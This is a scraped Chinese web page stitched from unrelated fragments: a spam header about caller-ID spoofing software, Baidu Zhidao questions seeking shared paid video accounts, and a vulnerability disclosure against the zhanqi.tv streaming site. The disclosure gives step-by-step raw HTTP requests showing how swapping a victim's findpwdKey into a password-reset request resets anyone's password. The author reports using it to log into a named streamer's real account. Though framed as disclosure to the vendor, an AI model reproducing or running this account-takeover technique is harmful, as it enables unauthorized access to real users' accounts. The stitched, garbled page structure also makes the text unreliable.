号码任意游帐号播谁有帐号

来源:蜘蛛抓取(WebSpider) 时间:2016-05-10 13:47 标签: 任意显示号码软件
大家都在看
记者体验:利用软件以假乱真,手机来电能显示任意号码。
视频集介绍
国家/地区:
视频简介:上传时间:
专辑名称:
专辑创建者:
视频数:14
播放次数:460,122
更多教学尽在QQ群
56官方微信
扫一扫发现精彩谁有腾讯视频,乐视视频或其他任意一款播放器的会员号,急求分享!!可私聊,付费也可以_百度知道
谁有腾讯视频,乐视视频或其他任意一款播放器的会员号,急求分享!!可私聊,付费也可以
第二步,请访问www.html" target="_blank">http.第三步,您可以通过邮箱或手机注册成为会员://shop,您可以直接点击“立即加入”会员;&nbsp.letv,更多超级电视信息.com/index第一步.letv
其他类似问题
为您推荐:
腾讯视频的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁什么视频播放器可以任意调整播放器窗口的大小_百度知道
什么视频播放器可以任意调整播放器窗口的大小
提问者采纳
家的讴乐高清网络机顶盒里面内置了十几个视频播放器,可以任意调整它的全屏状态和超清高清效果,其他的视屏播放器也可以调整窗口大小,每个都试了,我比较喜欢PPTV
其他类似问题
为您推荐:
视频播放器的相关知识
其他2条回答
我想知道哪个播放器还不能随意调节大小。。。
迅雷看看,百度影音,暴风也可以试试
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
战旗TV可登录任意用户账户,任意用户。。。
详细说明:
漏洞在于找回密码的设计缺陷
找回密码过程(手机为例):
首先输入用户名/手机号码/邮箱地址
然后输入验证码
然后选择找回方式(手机或邮箱) 选择手机后点击获取验证码
尝试爆破验证码提交请求失败
使用burp观察下每部的请求与应答报文,看看有没有什么其它漏洞
以下是点击获取验证码后输入验证码,设置新密码提交后的报文
code 区域POST /api/public/user.resetpwd HTTP/1.1
Host: www.zhanqi.tv
Content-Length: 153
Accept: */*
Origin: http://www.zhanqi.tv
X-Requested-With: XMLHttpRequest
User-Agent: WeChat/6.3.9.18 CFNetwork/758.0.2 Darwin/15.0.0
Content-Type: application/x-www-form- charset=UTF-8
Referer: http://www.zhanqi.tv/user/findpwd/reset
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,q=0.8,zh-TW;q=0.6
Cookie: PHPSESSID=klflpa4galj916tjkek0ajb4i1; gid=; player_num_id=; ZQ_GUID=78DEC7C7-701E-89DB-2CBC-015B1ED8A8E2; ZQ_GUID_C=78DEC7C7-701E-89DB-2CBC-015B1ED8A8E2; tj_uid=; pgv_pvi=; pgv_info=ssi=s; Hm_lvt_299cfc89fdbad=,,,; Hm_lpvt_299cfc89fdbad=
X-Forwarded-For: 1.136.59.95
identityKey=identity_key_85fe47dedd196f20a0306abe8623aea1&findpwdKey=findpwd_key_f7af2d2e8&password=111111&confirm_password=111111
发现核心应该是identityKey和findpwdKey,identityKey应该与验证码绑定,判断验证码是否正确,findpwdKey应该是和登录信息绑定,应该是借此照到对应用户。
有点思路了
想办法照到想要修改的用户的findpwdKey
替换到我这边来应该就好了
首先用攻击对象的账户找回密码,点击手机找回,然后获取验证码,不用管验证码是多少,随便输入个111111 使用burp拦截下来,果然获取到了攻击对象的findpwdKey:
code 区域POST /api/public/user.verify_code HTTP/1.1
Host: www.zhanqi.tv
Content-Length: 79
Accept: */*
Origin: http://www.zhanqi.tv
X-Requested-With: XMLHttpRequest
User-Agent: WeChat/6.3.9.18 CFNetwork/758.0.2 Darwin/15.0.0
Content-Type: application/x-www-form- charset=UTF-8
Referer: http://www.zhanqi.tv/user/findpwd/mobile
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,q=0.8,zh-TW;q=0.6
Cookie: PHPSESSID=klflpa4galj916tjkek0ajb4i1; gid=; player_num_id=; ZQ_GUID=78DEC7C7-701E-89DB-2CBC-015B1ED8A8E2; ZQ_GUID_C=78DEC7C7-701E-89DB-2CBC-015B1ED8A8E2; tj_uid=; pgv_pvi=; pgv_info=ssi=s; Hm_lvt_299cfc89fdbad=,,,; Hm_lpvt_299cfc89fdbad=
X-Forwarded-For: 1.136.59.95
type=mobile&findpwdKey=findpwd_key_3b87c172cacc8db68dffb37ae112a826&code=111111
现在把findpwdKey的值复制下来,替换到我直接拦截到的我的修改密码请求中:
code 区域POST /api/public/user.resetpwd HTTP/1.1
Host: www.zhanqi.tv
Content-Length: 153
Accept: */*
Origin: http://www.zhanqi.tv
X-Requested-With: XMLHttpRequest
User-Agent: WeChat/6.3.9.18 CFNetwork/758.0.2 Darwin/15.0.0
Content-Type: application/x-www-form- charset=UTF-8
Referer: http://www.zhanqi.tv/user/findpwd/reset
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,q=0.8,zh-TW;q=0.6
Cookie: PHPSESSID=klflpa4galj916tjkek0ajb4i1; gid=; player_num_id=; ZQ_GUID=78DEC7C7-701E-89DB-2CBC-015B1ED8A8E2; ZQ_GUID_C=78DEC7C7-701E-89DB-2CBC-015B1ED8A8E2; tj_uid=; pgv_pvi=; pgv_info=ssi=s; Hm_lvt_299cfc89fdbad=,,,; Hm_lpvt_299cfc89fdbad=
X-Forwarded-For: 1.136.59.95
identityKey=identity_key_85fe47dedd196f20a0306abe8623aea1&findpwdKey=findpwd_key_3b87c172cacc8db68dffb37ae112a826&password=111111&confirm_password=111111
最后,提交报文,返回密码修改成功
使用111111登录别人的账户,直接提示帐号危险,不用管,刷新下页面就成功登录了
漏洞证明:
好吧,就登录下dota人气直播陈智豪的帐号吧
登录成功:
。。。我可不敢点开播
修复方案:
你们更专业
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:12
确认时间: 17:11
厂商回复:
非常感谢大师!此漏洞攻击条件是已知 登录账号/手机/邮箱 ,而这些都是默认不公开紧自己可见的,所以影响范围有限。在大师提供的案例中 陈智豪 的昵称恰好与登录账号一样。非常感谢大师!
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
智障豪中枪
hao娘 怒草洞主
@钱塘老娘舅 = =
@wefgod 陈智豪是女主播
挺严重的洞了,能有限到哪去 ==!
登录后才能发表评论,请先

我要回帖

更多关于 任意显示号码软件 的文章

 

随机推荐